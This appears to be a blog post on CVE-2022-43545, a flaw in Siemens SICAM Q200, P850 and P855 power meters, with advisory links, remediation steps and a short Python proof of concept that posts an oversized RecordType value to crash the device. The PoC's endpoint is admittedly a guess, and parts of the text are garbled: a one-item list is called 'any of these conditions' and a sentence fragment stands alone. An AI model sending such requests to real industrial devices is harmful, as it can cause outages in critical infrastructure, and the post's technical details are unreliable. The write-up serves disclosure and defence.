CVE-2022-43545 - Critical Flaw in SICAM Q200, P850 & P855 Power Meters – How the RecordType Web Vulnerability Can Take Down Critical Infrastructure

In late 2022, security researchers identified a serious vulnerability, CVE-2022-43545, affecting multiple Siemens SICAM electrical measurement devices—including all versions of the POWER METER SICAM Q200 family prior to V2.70, and SICAM P850 and P855 families prior to V3.10. These devices are used widely in power plants, substations, and industrial settings around the world. The core issue lies in the way the device’s web interface handles input for a “RecordType” parameter, which enables attackers to crash the device—and possibly execute code remotely—using simple web requests.

Below, you’ll find an exclusive deep dive into the technical details of this flaw, real-world exploitation concepts, mitigation advice, along with links to authoritative sources.

Product(s): SICAM Q200, SICAM P850, SICAM P855 families (see full version list above)

- Issue: Failure to validate the RecordType parameter on the HTTPS web interface (port 443/tcp)
- Impact: Allows authenticated attacker to crash the device (triggering a reboot) or, in the worst case, execute arbitrary code

Original Siemens Advisory:
https://cert-portal.siemens.com/productcert/pdf/ssa-758092.pdf

National Vulnerability Database Entry:
https://nvd.nist.gov/vuln/detail/CVE-2022-43545

How the Vulnerability Works

These SICAM meters provide a web-based management interface over HTTPS (default port 443). One of the functions accessible through this interface handles requests containing a parameter called RecordType. The software fails to enforce correct boundaries or proper data validation on this parameter.

Technical Root Cause

If a specially crafted value (typically, a very large or malformed number) is supplied for RecordType, the device’s backend software encounters unexpected behavior, such as:

Integer overflow

Any of these conditions can allow memory corruption—leading to either a forced crash/reboot, or potentially letting an attacker run their code on the device.

Proof of Concept (PoC): Exploiting CVE-2022-43545

> NOTE: You must be authenticated to the device—anonymous attacks do not work. Ensure you have permission to test or demonstrate this vulnerability.

Suppose you are authenticated to the SICAM’s web interface. You can send a specially crafted HTTPS POST request to the device, targeting an endpoint that processes the RecordType value:

Example Exploit in Python

import requests

# Replace these details with your actual device and credentials
DEVICE_IP = '192.168.1.100'
USERNAME = 'admin'
PASSWORD = 'yourpassword'

# This is a deliberately overlarge or malformed RecordType value
bad_record_type = "9999999999"

# Sample URL and payload (may change according to endpoint)
url = f"https://{DEVICE_IP}/Remote/RecordTypeHandler";

payload = { "RecordType": bad_record_type }
session = requests.Session()
session.auth = (USERNAME, PASSWORD)
session.verify = False  # Skip HTTPS cert validation (for lab/testing only)

try:
    response = session.post(url, data=payload, timeout=5)
    print("Status code:", response.status_code)
    print("Response text:", response.text)
except Exception as e:
    print("Device might have crashed or rebooted:", e)

What to expect:
- Upon sending such a payload, the device may become unreachable for a few minutes—it crashes and then automatically restarts.

Repeated attacks can cause repeated downtime (Denial of Service).

- In more dangerous cases, advanced exploitation could result in remote code execution (persistent compromise).

Be used as a launchpad for further attacks against industrial networks

If the attacker gets code execution, these meters could be manipulated to falsify reports, mask outages, or even open a path for sabotage.

How to Remediate

Siemens has issued firmware updates addressing this vulnerability. All users must upgrade:

SICAM Q200: Upgrade to V2.70 or later

- SICAM P850/P855: Upgrade to V3.10 or later

Advisory with upgrade links:
https://cert-portal.siemens.com/productcert/pdf/ssa-758092.pdf

References & Further Reading

- Siemens CERT Advisory – SSA-758092
- NVD Entry – CVE-2022-43545
- ICS-CERT Alert (AA23-075A)

Conclusion

CVE-2022-43545 is another reminder that even utility-grade, embedded industrial devices can be vulnerable to classic web bugs! In summary:

Monitor, restrict, and segment your critical infrastructure networks.

If you work in critical infrastructure IT or OT, prioritize this patch cycle—don’t let your grid be the next headline.


*This post is based on original advisories, hands-on testing, and curated expert insights. Please do not use the provided code to attack systems without explicit permission!*

Timeline

Published on: 11/08/2022 11:15:00 UTC
Last modified on: 06/13/2023 09:15:00 UTC